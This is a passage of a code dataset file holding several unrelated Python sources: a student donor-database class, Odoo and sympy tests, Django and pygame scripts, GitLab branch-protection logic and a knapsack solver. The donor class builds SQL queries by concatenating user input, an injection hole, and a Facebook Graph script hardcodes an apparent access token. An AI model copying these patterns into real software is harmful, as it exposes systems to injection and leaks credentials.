set(self.cursor.fetchall()) # unifying result by putting it into a set\n return raw\n \n\n def multiply(self, factor, above=None, below=None):\n if above is None and below is None:\n sql_show = 'select count(*) from mailroom where donation'\n sql_total = 'select sum(donation) from mailroom where donation'\n sql = 'update mailroom set donation = donation * ?'\n args = (factor,)\n self._preview(sql_show)\n self.map_multiply(factor)\n self._preview_total(sql_total, factor)\n self._decide(sql, args)\n elif below:\n sql_show = 'select count(*) from mailroom where donation < ' + below\n sql_total = 'select sum(donation) from mailroom where donation < ' + below\n sql = 'update mailroom set donation = donation * ? where donation < ?'\n args = (factor, below)\n self._preview(sql_show)\n self.map_multiply(factor, below=below)\n self._preview_total(sql_total, factor)\n self._decide(sql, args)\n elif above:\n sql_show = 'select count(*) from mailroom where donation > ' + above\n sql_total = 'select sum(donation) from mailroom where donation > ' + above\n sql = 'update mailroom set donation = donation * ? where donation > ?'\n args = (factor, above)\n self._preview(sql_show)\n self.map_multiply(factor, above=above)\n self._preview_total(sql_total, factor)\n self._decide(sql, args)\n return True\n \n \n def _decide(self, sql, args):\n decision = input('\\n\\tDo you really want to accept this CHALLENGE ? (Y/N)')\n if decision == 'Y':\n self._write_to_db(sql, args)\n else:\n print('\\n\\tCHALLENGE aborted.')\n\n\n def _preview(self, show):\n self.cursor.execute(show)\n rows = self._beautify(self.cursor.fetchall())\n print('\\n\\tThis operation would affect {} already existing donations!'.format(rows[0]))\n print('\\tSee a listing:\\n')\n\n \n def _preview_total(self, total, factor): \n self.cursor.execute(total)\n value = self._beautify(self.cursor.fetchall())\n value_int = int(value[0])\n result = value_int * int(factor)\n print('\\n\\tYou would have to give an additional donation of {} to pass the CHALLENGE !'.format(result))\n\n\n def _write_to_db(self, sql, args):\n try:\n self.cursor.execute(sql, args)\n self.db.commit()\n print('\\n\\tThank you! 
Donations successfully updated in database.')\n except sqlite3.Error as e:\n print('Exception raised 4: {}'.format(e))\n \n\n def map_multiply(self, factor, above=None, below=None):\n self.cursor.execute('select donation from mailroom where donation')\n donations_all = self._beautify(self.cursor.fetchall())\n if above is None and below is None: \n donations_after = list(map(lambda x: x * int(factor), donations_all))\n for i in zip(donations_all, donations_after):\n print('\\tcurrent donation: {:<10} multiplied: {}'.format(i[0], i[1]))\n elif below:\n donations_below = list(filter(lambda x: x < int(below), donations_all))\n donations_after = list(map(lambda x: x * int(factor), donations_below))\n for i in zip(donations_below, donations_after):\n print('\\tcurrent donation: {:<10} multiplied: {}'.format(i[0], i[1]))\n elif above:\n donations_above = list(filter(lambda x: x > int(above), donations_all))\n donations_after = list(map(lambda x: x * int(factor), donations_above))\n for i in zip(donations_above, donations_after):\n print('\\tcurrent donation: {:<10} multiplied: {}'.format(i[0], i[1]))\n\n\n # ToDo: make more consistent usage of this function throughout the program... or omit it at all.\n def _beautify(self, listoftuples):\n ''' cursor.fetchall() returns a list of tuples (in our case mostly one-element tuples).\n This method changes that into a list of single items (INT, STRING, whatever). \n '''\n resultlist = [x[0] for x in listoftuples] \n return resultlist\n \n\n def report(self):\n donordict = defaultdict(list)\n maxn = 0\n for i in self.get_all_donors():\n person = i[0]\n total = self._get_donations_total(person)\n slen = len(str(total))\n if slen > maxn:\n maxn = slen\n num = self._get_number_of_donations(person)\n avg = self._get_average_donation(person)\n donordict[person].append(total)\n donordict[person].append(num)\n donordict[person].append(avg)\n maxn += 3\n fstring = '\\t{:<20} ' + '|' + '{:>' + str(maxn) + '} ' + '|' + '{:>9}' + '|' + '{:>20}' \n print(fstring.format('Donor Name', 'Total', 'Num Gifts', 'Average Gift')) \n print('\\t' + '-' * (maxn + 54)) \n for i in donordict:\n print(fstring.format(i, donordict[i][0], donordict[i][1], donordict[i][2])) \n \n \n def mail(self):\n with open('./MAIL_TEMPLATE', 'r') as fr:\n lines = fr.readlines()\n for name in self._beautify(self.get_all_donors()):\n ts = time.strftime('%Y%m%d-%H%M%S')\n filename = name + '_' + ts + '.txt'\n self.cursor.execute('select * from donors where uid = ?', (name,))\n result = self.cursor.fetchall()\n if len(result) == 0:\n print('====Last_donation not found: {}'.format(name))\n else:\n last_donation = result[0][3]\n donation = str(last_donation)\n with open(filename, 'w') as fw:\n for i in lines:\n if 'NAME' in i:\n new = i.replace('NAME', name)\n fw.write(new)\n elif 'DONATION' in i:\n new = i.replace('DONATION', donation)\n fw.write(new)\n else:\n fw.write(i)\n print('\\tMailtext for {} successfully written to {}'.format(name, filename))\n \n \n\n","sub_path":"students/elmar_m/lesson10/classes_mailroom.py","file_name":"classes_mailroom.py","file_ext":"py","file_size_in_byte":9763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"115992332","text":"# Copyright 2020 VentorTech OU\n# License LGPL-3.0 or later (https://www.gnu.org/licenses/lgpl-3.0).\n\nfrom datetime import date\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestStockRouting(TransactionCase):\n\n def setUp(self):\n super(TestStockRouting, self).setUp()\n\n 
self.base_company = self.env.ref('base.main_company')\n\n self.product_product_model = self.env['product.product']\n self.res_users_model = self.env['res.users']\n self.stock_location_model = self.env['stock.location']\n self.stock_move_model = self.env['stock.move']\n self.stock_picking_model = self.env['stock.picking']\n self.stock_quant_model = self.env['stock.quant']\n\n self.picking_internal = self.env.ref('stock.picking_type_internal')\n\n today = date.today()\n\n self.env['res.config.settings'].create({\n 'outgoing_routing_strategy': 'location_id.removal_prio',\n 'outgoing_routing_order': '0',\n 'stock_reservation_strategy': 'base',\n }).execute()\n\n self.stock_A = self.stock_location_model.create({\n 'name': 'A',\n 'usage': 'internal',\n })\n\n self.stock_A1 = self.stock_location_model.create({\n 'name': 'A-1',\n 'usage': 'internal',\n 'location_id': self.stock_A.id,\n 'removal_prio': 2,\n })\n\n self.stock_A2 = self.stock_location_model.create({\n 'name': 'A-2',\n 'usage': 'internal',\n 'location_id': self.stock_A.id,\n 'removal_prio': 3,\n })\n\n self.stock_A3 = self.stock_location_model.create({\n 'name': 'A-3',\n 'usage': 'internal',\n 'location_id': self.stock_A.id,\n 'removal_prio': 1,\n })\n\n self.stock_B = self.stock_location_model.create({\n 'name': 'B',\n 'usage': 'internal',\n })\n\n self.product_Z = self.product_product_model.create({\n 'name': 'Product',\n 'type': 'product',\n })\n\n quant_1 = self.stock_quant_model.create({\n 'product_id': self.product_Z.id,\n 'location_id': self.stock_A1.id, # prio:2\n 'quantity': 15.0,\n 'in_date': today,\n })\n\n quant_2 = self.stock_quant_model.create({\n 'product_id': self.product_Z.id,\n 'location_id': self.stock_A2.id, # prio:3\n 'quantity': 5.0,\n 'in_date': today,\n })\n\n quant_3 = self.stock_quant_model.create({\n 'product_id': self.product_Z.id,\n 'location_id': self.stock_A3.id, # prio:1\n 'quantity': 10.0,\n 'in_date': today,\n })\n\n self.quants = quant_1 + quant_2 + quant_3\n\n def test_stock_reservation_by_priority_case1(self):\n quants = self.stock_quant_model._update_reserved_quantity(self.product_Z, self.stock_A, 10)\n for quant, quantity in quants:\n if quant.location_id == self.stock_A1: self.assertEqual(quant.reserved_quantity, 0.0, 'No products should be reserved in A-1 (prio:2)')\n if quant.location_id == self.stock_A2: self.assertEqual(quant.reserved_quantity, 0.0, 'No products should be reserved in A-2 (prio:3)')\n if quant.location_id == self.stock_A3: self.assertEqual(quant.reserved_quantity, 10.0, '10 products should be reserved in A-3 (prio:1)')\n\n def test_stock_reservation_by_priority_case2(self):\n quants = self.stock_quant_model._update_reserved_quantity(self.product_Z, self.stock_A, 12)\n for quant, quantity in quants:\n if quant.location_id == self.stock_A1: self.assertEqual(quant.reserved_quantity, 2.0, '2 products should be reserved in A-1 (prio:2)')\n if quant.location_id == self.stock_A2: self.assertEqual(quant.reserved_quantity, 0.0, 'No products should be reserved in A-2 (prio:3)')\n if quant.location_id == self.stock_A3: self.assertEqual(quant.reserved_quantity, 10.0, '10 products should be reserved in A-3 (prio:1)')\n\n def test_stock_reservation_by_priority_case3(self):\n quants = self.stock_quant_model._update_reserved_quantity(self.product_Z, self.stock_A, 22)\n for quant, quantity in quants:\n if quant.location_id == self.stock_A1: self.assertEqual(quant.reserved_quantity, 12.0, '12 products should be reserved in A-1 (prio:2)')\n if quant.location_id == self.stock_A2: 
self.assertEqual(quant.reserved_quantity, 0.0, 'No products should be reserved in A-2 (prio:3)')\n if quant.location_id == self.stock_A3: self.assertEqual(quant.reserved_quantity, 10.0, '10 products should be reserved in A-3 (prio:1)')\n","sub_path":"outgoing_routing/tests/test_stock_reservation_by_priority.py","file_name":"test_stock_reservation_by_priority.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"537569208","text":"#!/usr/bin/env python3\n# vim:set ff=unix expandtab ts=4 sw=4:\nimport unittest\nimport numpy as np\nimport sys \nfrom scipy.misc import factorial\nfrom scipy.interpolate import interp1d \nfrom sympy import sin, symbols, Matrix, latex, Symbol, exp, solve, Eq, pi, Piecewise\n\nimport bgc_md.tests.exampleSmoothReservoirModels as ESRM\nimport bgc_md.tests.exampleSmoothModelRuns as ESMR\n\nfrom testinfrastructure.InDirTest import InDirTest\nfrom bgc_md.SmoothReservoirModel import SmoothReservoirModel \nfrom bgc_md.SmoothModelRun import SmoothModelRun \n\nclass M:\n def __init__(self,func_set = {}):\n print(func_set)\n self.func_set = func_set\n\nclass TestSmoothModelRun(InDirTest):\n def test_1(self):\n d={\"a\":1}\n m = M(d)\n\n def test_2(self):\n m = M()\n \n def test_linearize_piecewise(self):\n # Atmosphere, Terrestrial Carbon and Surface layer\n C_A, C_T, C_S = symbols('C_A C_T C_S')\n \n # equilibrium contents\n A_e, T_e, S_e = symbols('A_e T_e S_e')\n \n # equilibrium fluxes\n F_0, F_1, F_2 = symbols('F_0 F_1 F_2')\n \n # nonlinear coefficients\n alpha, beta = symbols('alpha beta')\n \n # external flux from surface layer to deep ocean\n F_ex = F_0*C_S/S_e\n \n # fossil fuel inputs\n u_A = symbols('u_A')\n \n \n #########################################\n \n state_vector = Matrix([C_A, C_T, C_S])\n time_symbol = symbols('tau')\n \n input_fluxes = {0: u_A, 1: 0, 2: F_0}\n output_fluxes = {0: Piecewise((1, time_symbol < 0), (0, True)), 1: 0, 2: F_0*C_S/S_e}\n internal_fluxes = {(0,1): F_2*(C_A/A_e)**alpha, # A --> T\n (0,2): F_1*C_A/A_e, # A --> S\n (1,0): F_2*C_T/T_e, # T --> A\n (2,0): F_1*(C_S/S_e)**beta} # S --> A\n nonlinear_srm = SmoothReservoirModel(state_vector, time_symbol, input_fluxes, output_fluxes, internal_fluxes)\n \n A_eq, T_eq, S_eq = (700.0, 3000.0, 1000.0) \n par_dict = { A_e: A_eq, T_e: T_eq, S_e: S_eq, # equilibrium contents in Pg\n F_0: 45.0, F_1: 100.0, F_2: 60.0, # equilibrium fluxes in PgC/yr\n alpha: 0.2, beta: 10.0 } # nonlinear coefficients\n \n \n # fossil fuel inputs\n par_dict[u_A] = 0\n \n # initialize model run \n times = np.linspace(0, 10, 101)\n start_values = np.array([A_eq, T_eq, S_eq])\n nonlinear_smr = SmoothModelRun(nonlinear_srm, par_dict, start_values, times)\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestSmoothModelRun)\n unittest.main()\n","sub_path":"bgc_md/tests/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"334504613","text":"from django.conf import settings\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.core.mail import EmailMultiAlternatives\n\n\nclass MailMaker(object):\n\n def __init__(\n self,\n jurisdiction,\n subject='PollWorker application from workelections.com',\n **kwargs\n ):\n # Make sure email is valid\n if settings.TEST_TO_EMAIL:\n self.to_email = settings.TEST_TO_EMAIL\n else:\n 
self.to_email = jurisdiction.email\n        self.from_email = settings.DEFAULT_FROM_EMAIL\n        self.subject = subject\n        self.context = {\n            'jurisdiction': jurisdiction,\n        }\n\n        self.context.update(kwargs)\n\n        self.html_template = get_template('mailman/html_template.html')\n        self.text_template = get_template('mailman/text_template.txt')\n\n    def send(self):\n        if self.context:\n            c = Context(self.context)\n\n        text_content = self.text_template.render(c)\n        html_content = self.html_template.render(c)\n\n        msg = EmailMultiAlternatives(self.subject, text_content,\n                                     self.from_email, [self.to_email])\n        msg.content_subtype = \"html\"\n        msg.attach_alternative(html_content, \"text/html\")\n        msg.send()\n","sub_path":"apps/mailman/mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"344746014","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\nimport blog.settings\nfrom os import listdir\nfrom os.path import isfile, join, splitext\nimport random\n\n# Create your views here.\ndef index(request):\n    template = loader.get_template('sleepers/index.html')\n    fileHome = blog.settings.MEDIA_ROOT\n    all_files = []\n    batch_names = ['batch2', 'batch1']\n    for batch_name in batch_names:\n        all_files += get_batch(fileHome, batch_name)\n    context = RequestContext(request, {\n        'files': all_files,\n    })\n    return HttpResponse(template.render(context))\n\n\ndef get_batch(file_home, batch_name):\n    onlyfiles = []\n    whole_path = file_home+batch_name\n    for f in listdir(whole_path):\n        if isfile(join(whole_path, f)) and splitext(f)[1] == '.jpg':\n            onlyfiles.append('/media/'+batch_name+'/'+f)\n    random.shuffle(onlyfiles)\n    return onlyfiles","sub_path":"sleepers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"552031401","text":"import pygame,sys,random\nimport threading\nfrom time import sleep \n\npygame.init()\nscreen = pygame.display.set_mode((500,500), pygame.RESIZABLE)\npygame.display.get_caption()\nRect1 = pygame.Rect(200,200,10,10)\nRect2 = pygame.Rect(0,0,100,100)\nestado=False\nclass Mouse:\n\tdef __init__(self):\n\t\tself.estado = False\n\t\tself.Rectangulo= (0,0,0,0)\n\t\tself.a=(0,0)\n\t\n\tdef seleccion(self,screen):\n\t\t\n\t\t\n\t\tif pygame.mouse.get_pressed()[0]==1 and self.estado ==False :\n\t\t\t\tself.a = pygame.mouse.get_pos()\n\t\t\t\tprint (self.a)\n\t\t\t\tself.estado=True\n\t\tif pygame.mouse.get_pressed()[0]==0 and self.estado==True:\n\t\t\t\t\tb=pygame.mouse.get_pos()\n\t\t\t\t\tprint (b)\n\t\t\t\t\tself.estado = False\n\t\t\t\t\tif (self.a[0]<b[0] and self.a[1]>b[1]):\n\t\t\t\t\t\tself.Rectangulo = pygame.Rect(self.a[0],b[1],(b[0]-self.a[0]),(self.a[1]-b[1]))\n\t\t\t\t\t\t\n\t\t\t\t\tif \t(self.a[0]>b[0] and self.a[1]>b[1]):\n\t\t\t\t\t\tself.Rectangulo = pygame.Rect(b[0],b[1],(self.a[0]-b[0]),(self.a[1]-b[1]))\t\n\t\t\t\t\t\t\n\t\t\t\t\tprint (self.Rectangulo)\t\n\t\t\t\t\tpygame.draw.rect(screen,(255,255,255),self.Rectangulo)\t\n\t\t\t\t\tsleep(0.05)\n\n\n\t\t\t\t \n\t\n\n\n \n\ndef main():\n\t# minimal event loop that drives the Mouse selection on the screen\n\tmouse = Mouse()\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\tmouse.seleccion(screen)\n\t\tpygame.display.update()\n\n\nmain()\n","sub_path":"OrdaComposite.py","file_name":"OrdaComposite.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"492050549","text":"import facepy\nimport pickle\n\n\ndef RemoveDomain(link):\n    baseDomain = 
\"https://graph.facebook.com/v2.6/\"\n    pos = link.find(baseDomain)\n    link = link[len(baseDomain):]\n    return link\n\ny = pickle.load(open(\"structureOfPost.p\",\"rb\"))\n\ndataType = 'likes'\n\ndataSheath = y[dataType]\n\nData = []\n\noauth_access_token = 'EAACEdEose0cBAELyLBZC21iJp6oH86InE3famYUT4E4i497DFlXL3jEKvd2OZBFFzIiMUdfHtMU48noIUg44tz9ksbVD2fQ2ZBsBcJJNe9O0jEXKEpG5ynYeueZAOVdFgm1W8QeZClT4BnIZBiN3oE4i8BUCY0qT28P2C7Q5Wk3QZDZD'\n\ngraph = facepy.GraphAPI(oauth_access_token)\n\nlastPost = False\n\nwhile(True):\n    Data.extend(dataSheath['data'])\n    if lastPost:\n        break\n    link = RemoveDomain(dataSheath['paging']['next'])\n    dataSheath = graph.get(link)\n    if 'next' not in dataSheath['paging']:\n        lastPost = True\n\npickle.dump(Data,open(\"structureOfLikesData.p\",\"wb\"))\n\n\n\n\n","sub_path":"AddingontoDataParametrized.py","file_name":"AddingontoDataParametrized.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"123242186","text":"from logging import debug\nfrom cli_ui import warning, fatal\n\nfrom gitlabform import EXIT_PROCESSING_ERROR, EXIT_INVALID_INPUT\nfrom gitlabform.gitlab import GitLab\nfrom gitlabform.gitlab.core import NotFoundException\n\n\nclass BranchProtector(object):\n    old_api_keys = [\"developers_can_push\", \"developers_can_merge\"]\n    new_api_keys = [\n        \"push_access_level\",\n        \"merge_access_level\",\n        \"unprotect_access_level\",\n    ]\n    extra_param_keys = [\n        \"allowed_to_push\",\n        \"allowed_to_merge\",\n    ]\n\n    def __init__(self, gitlab: GitLab, strict: bool):\n        self.gitlab = gitlab\n        self.strict = strict\n\n    def apply_branch_protection_configuration(\n        self, project_and_group, configuration, branch\n    ):\n        try:\n            requested_configuration = configuration[\"branches\"][branch]\n\n            if requested_configuration.get(\"protected\"):\n                self.protect_branch(project_and_group, configuration, branch)\n            else:\n                self.unprotect_branch(project_and_group, branch)\n\n        except NotFoundException:\n            message = f\"Branch '{branch}' not found when trying to set it as protected/unprotected!\"\n            if self.strict:\n                fatal(\n                    message,\n                    exit_code=EXIT_PROCESSING_ERROR,\n                )\n            else:\n                warning(message)\n\n    def protect_branch(self, project_and_group, configuration, branch):\n        try:\n            requested_configuration = configuration[\"branches\"][branch]\n\n            config_type = self.get_branch_protection_config_type(\n                project_and_group, requested_configuration, branch\n            )\n\n            if config_type == \"old\":\n\n                self.protect_using_old_api(\n                    requested_configuration, project_and_group, branch\n                )\n\n            elif config_type == \"new\":\n                # when configuration contains at least one of allowed_to_push and allowed_to_merge\n                if any(\n                    extra_key in requested_configuration\n                    for extra_key in self.extra_param_keys\n                ):\n                    for extra_param_key in self.extra_param_keys:\n                        # check if an extra_param is in config and it contains a user parameter\n                        if extra_param_key in requested_configuration and any(\n                            \"user\" in d\n                            for d in requested_configuration[extra_param_key]\n                        ):\n                            for extra_config in requested_configuration[\n                                extra_param_key\n                            ]:\n                                # loop over the array of extra params and get the user_id related to the user\n                                if \"user\" in extra_config.keys():\n                                    user_id = self.gitlab.get_user_to_protect_branch(\n                                        extra_config.pop(\"user\")\n                                    )\n                                    extra_config[\"user_id\"] = user_id\n\n                if self.configuration_update_needed(\n                    requested_configuration, project_and_group, branch\n                ):\n                    self.protect_using_new_api(\n                        requested_configuration, project_and_group, branch\n                    )\n                else:\n                    debug(\n                        
\"Skipping set branch '%s' access levels because they're already set\",\n                        branch,\n                    )\n\n            if \"code_owner_approval_required\" in requested_configuration:\n\n                self.set_code_owner_approval_required(\n                    requested_configuration, project_and_group, branch\n                )\n\n        except NotFoundException:\n            message = f\"Branch '{branch}' not found when trying to set it as protected/unprotected!\"\n            if self.strict:\n                fatal(\n                    message,\n                    exit_code=EXIT_PROCESSING_ERROR,\n                )\n            else:\n                warning(message)\n\n    def unprotect_branch(self, project_and_group, branch):\n        try:\n            debug(\"Setting branch '%s' as unprotected\", branch)\n\n            # we don't know if the old or new API was used to protect\n            # so use both when unprotecting\n\n            # ...except for wildcard branch names - they are not supported by the old API\n            if \"*\" not in branch:\n                self.gitlab.unprotect_branch(project_and_group, branch)\n\n            self.gitlab.unprotect_branch_new_api(project_and_group, branch)\n\n        except NotFoundException:\n            message = f\"Branch '{branch}' not found when trying to set it as protected/unprotected!\"\n            if self.strict:\n                fatal(\n                    message,\n                    exit_code=EXIT_PROCESSING_ERROR,\n                )\n            else:\n                warning(message)\n\n    def get_branch_protection_config_type(\n        self, project_and_group, requested_configuration, branch\n    ):\n\n        # for the new API any of the keys needs to be defined...\n        if any(key in requested_configuration for key in self.new_api_keys):\n            return \"new\"\n\n        # ...while for the old API - *all* of them\n        if all(key in requested_configuration for key in self.old_api_keys):\n            return \"old\"\n\n        else:\n            fatal(\n                f\"Invalid configuration for protecting branches in project '{project_and_group}',\"\n                f\" branch '{branch}' - missing keys.\",\n                exit_code=EXIT_INVALID_INPUT,\n            )\n\n    def protect_using_old_api(self, requested_configuration, project_and_group, branch):\n        warning(\n            f\"Using keys {self.old_api_keys} for configuring protected\"\n            \" branches is deprecated and will be removed in future versions of GitLabForm.\"\n            f\" Please start using new keys: {self.new_api_keys}\"\n        )\n        debug(\"Setting branch '%s' as *protected*\", branch)\n\n        # unprotect first to reset 'allowed to merge' and 'allowed to push' fields\n        self.gitlab.unprotect_branch_new_api(project_and_group, branch)\n\n        self.gitlab.protect_branch(\n            project_and_group,\n            branch,\n            requested_configuration[\"developers_can_push\"],\n            requested_configuration[\"developers_can_merge\"],\n        )\n\n    def protect_using_new_api(self, requested_configuration, project_and_group, branch):\n        debug(\"Setting branch '%s' access level\", branch)\n\n        # unprotect first to reset 'allowed to merge' and 'allowed to push' fields\n        self.gitlab.unprotect_branch_new_api(project_and_group, branch)\n\n        protect_rules = {\n            key: value\n            for key, value in requested_configuration.items()\n            if key != \"protected\"\n        }\n\n        self.gitlab.branch_access_level(\n            project_and_group,\n            branch,\n            protect_rules,\n        )\n\n    def set_code_owner_approval_required(\n        self, requested_configuration, project_and_group, branch\n    ):\n        debug(\n            \"Setting branch '%s' \\\"code owner approval required\\\" option\",\n            branch,\n        )\n        self.gitlab.branch_code_owner_approval_required(\n            project_and_group,\n            branch,\n            requested_configuration[\"code_owner_approval_required\"],\n        )\n\n    def configuration_update_needed(\n        self, requested_configuration, project_and_group, branch\n    ):\n        # get current configuration of branch access level\n        (\n            current_push_access_levels,  # push access level array only\n            current_merge_access_levels,  # merge access level array only\n            current_push_access_user_ids,  # 
    def configuration_update_needed(\n        self, requested_configuration, project_and_group, branch\n    ):\n        # get current configuration of branch access level\n        (\n            current_push_access_levels,  # push access level array only\n            current_merge_access_levels,  # merge access level array only\n            current_push_access_user_ids,  # push allowed user array\n            current_merge_access_user_ids,  # merge allowed user array\n            current_unprotect_access_level,\n        ) = self.gitlab.get_only_branch_access_levels(project_and_group, branch)\n\n        requested_push_access_levels = []\n        if \"push_access_level\" in requested_configuration:\n            requested_push_access_levels.append(\n                requested_configuration.get(\"push_access_level\")\n            )\n\n        requested_push_access_user_ids = []\n        if \"allowed_to_push\" in requested_configuration:\n            for config in requested_configuration[\"allowed_to_push\"]:\n                if \"access_level\" in config:\n                    # complete push access level arrays with the allowed_to_push array if access_level is defined\n                    requested_push_access_levels.append(config[\"access_level\"])\n                elif \"user_id\" in config:\n                    # complete push allowed user arrays with the allowed_to_push array data if user_id is defined\n                    requested_push_access_user_ids.append(config[\"user_id\"])\n                elif \"user\" in config:\n                    # complete push allowed user arrays with the allowed_to_push array data if user is defined\n                    requested_push_access_user_ids.append(\n                        self.gitlab.get_user_to_protect_branch(config[\"user\"])\n                    )\n\n        requested_push_access_levels.sort()\n        requested_push_access_user_ids.sort()\n\n        requested_merge_access_levels = []\n        if \"merge_access_level\" in requested_configuration:\n            requested_merge_access_levels.append(\n                requested_configuration.get(\"merge_access_level\")\n            )\n\n        requested_merge_access_user_ids = []\n        if \"allowed_to_merge\" in requested_configuration:\n            for config in requested_configuration[\"allowed_to_merge\"]:\n                if \"access_level\" in config:\n                    # complete merge access level arrays with the allowed_to_merge array if access_level is defined\n                    requested_merge_access_levels.append(config[\"access_level\"])\n                elif \"user_id\" in config:\n                    # complete merge allowed user arrays with the allowed_to_merge array data if user_id is defined\n                    requested_merge_access_user_ids.append(config[\"user_id\"])\n                elif \"user\" in config:\n                    # complete merge allowed user arrays with the allowed_to_merge array data if user is defined\n                    requested_merge_access_user_ids.append(\n                        self.gitlab.get_user_to_protect_branch(config[\"user\"])\n                    )\n\n        requested_merge_access_levels.sort()\n        requested_merge_access_user_ids.sort()\n\n        requested_unprotect_access_level = requested_configuration.get(\n            \"unprotect_access_level\"\n        )\n\n        return (\n            requested_push_access_levels,\n            requested_merge_access_levels,\n            requested_push_access_user_ids,\n            requested_merge_access_user_ids,\n            requested_unprotect_access_level,\n        ) != (\n            current_push_access_levels,\n            current_merge_access_levels,\n            current_push_access_user_ids,\n            current_merge_access_user_ids,\n            current_unprotect_access_level,\n        )\n\n    def unprotect(self, project_and_group, branch):\n        debug(\"Setting branch '%s' as unprotected\", branch)\n        self.gitlab.unprotect_branch_new_api(project_and_group, branch)\n","sub_path":"gitlabform/processors/util/branch_protector.py","file_name":"branch_protector.py","file_ext":"py","file_size_in_byte":11427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"509830638","text":"# https://www.jianshu.com/p/ef78cc3cad24 collection of dynamic programming problems\n\ndef backpack( backWeight, weightList, valueList):\n    \"\"\"\n    Dynamic programming: write a function that helps you pick the most valuable set of items.\n    You can use the example below while writing the program: assume the backpack can hold a\n    total weight of 20 and you have the following 5 items:\n    item   weight   value \n    0      2        3 \n    1      3        4 \n    2      4        8 \n    3      5        8 \n    4      9        10\n    \"\"\"\n    itemSelected = []\n    dp = [ [ 0 for _ in range( backWeight + 1) ] for _ in range( len(weightList) ) ] \n\n
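The nested loop that follows fills dp with the standard 0/1 knapsack recurrence; on the first pass (item == 0) the dp[item-1] index wraps to dp[-1], the still all-zero last row, which is why no padding row is needed. The same recurrence in a minimal standalone form (illustrative names, not from the source):

def knapsack_value(capacity, weights, values):
    n = len(weights)
    dp = [[0] * (capacity + 1) for _ in range(n + 1)]  # explicit padding row
    for i in range(1, n + 1):
        for w in range(1, capacity + 1):
            dp[i][w] = dp[i - 1][w]  # skip item i-1
            if w >= weights[i - 1]:  # or take it, if it fits
                dp[i][w] = max(dp[i][w], dp[i - 1][w - weights[i - 1]] + values[i - 1])
    return dp[n][capacity]

# the example from the docstring: items 0, 2, 3 and 4 fill the pack exactly (2+4+5+9 = 20)
assert knapsack_value(20, [2, 3, 4, 5, 9], [3, 4, 8, 8, 10]) == 29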
    for item in range( len(weightList) ):\n        for weight in range(1, backWeight + 1):\n            if weight >= weightList[item]:\n                dp[item][weight] = max(dp[item-1][weight], dp[item-1][weight - weightList[item]] + valueList[item])\n            else:\n                dp[item][weight] = dp[item-1][weight]\n    \n    reserveWeight = backWeight\n    for item in range( len(weightList)-1, 0 , -1 ):\n        if dp[item][reserveWeight] > dp[item - 1][reserveWeight]:\n            itemSelected.append(item)\n            reserveWeight -= weightList[item]\n    # the loop above never reaches item 0, so check it explicitly\n    if dp[0][reserveWeight] > 0:\n        itemSelected.append(0)\n    \n    return dp[len(weightList)-1][backWeight],itemSelected\n\n\n    \n\n\ndef main():\n\n    weightList = [2,3,4,5,9]\n    valueList = [3,4,8,8,10]\n    backWeight = 20\n    print(backpack(backWeight,weightList, valueList))\n\n\nmain()","sub_path":"data_structure/recursion/Dynamic planning/backpack.py","file_name":"backpack.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"513356847","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __init__ import _\nimport VMC_Classes\nimport VMC_Lists\nfrom Screens.Screen import Screen\nfrom enigma import eSize, ePoint\nfrom Components.ConfigList import *\nfrom Components.config import *\ntry:\n    from hashlib import sha1\nexcept:\n    import sha as sha1\nimport VMC_GUIComponents\n\n\nclass Selector(Screen):\n    def __init__(self, session):\n        self.session = session\n        path = \"/usr/lib/enigma2/python/Plugins/Extensions/VMC/skin/VMC_Screens_Selector.xml\"\n        with open(path, \"r\") as f:\n            self.skin = f.read()\n            f.close()\n        Screen.__init__(self, session)\n        self['list'] = VMC_GUIComponents.Selector(isscreen=True)\n        self['list'].hide()\n        self['actionsMoviesBase'] = ActionMap(['MovieSelectionActions',\n         'OkCancelActions',\n         'ColorActions',\n         'InfobarActions',\n         'ShortcutActions',\n         'WizardActions',\n         'ColorActions',\n         'SetupActions',\n         'NumberActions',\n         'MenuActions',\n         'EPGSelectActions'], {\n         'ok': self.keyOK,\n         'cancel': self.cancel,\n         'left': self.keyleft,\n         'right': self.keyright\n         }, -1)\n        self.onLayoutFinish.append(self.startrun)\n\n    def startrun(self):\n        self.onLayoutFinish.remove(self.startrun)\n        self.itemcount = self['list'].getitemcount()\n        self.width = (self['list'].getitemcount() * 100) + 80\n        self.height = 220\n        print(\"WIDTH: %d\" % self.width)\n        print(\"HEIGHT: %d\" % self.height)\n        self.instance.resize(eSize((self['list'].getitemcount() * 100) + 80, 220))\n        self.instance.move(ePoint((1920 - self.width) // 2, (1080 - self.height) // 2))\n        self['list'].show()\n\n    def keyleft(self):\n        self['list'].pageup()\n\n    def keyright(self):\n        self['list'].pagedown()\n\n    def keyOK(self):\n        index = self['list'].getcurrentselection()\n        self.close(index)\n\n\n    def cancel(self):\n        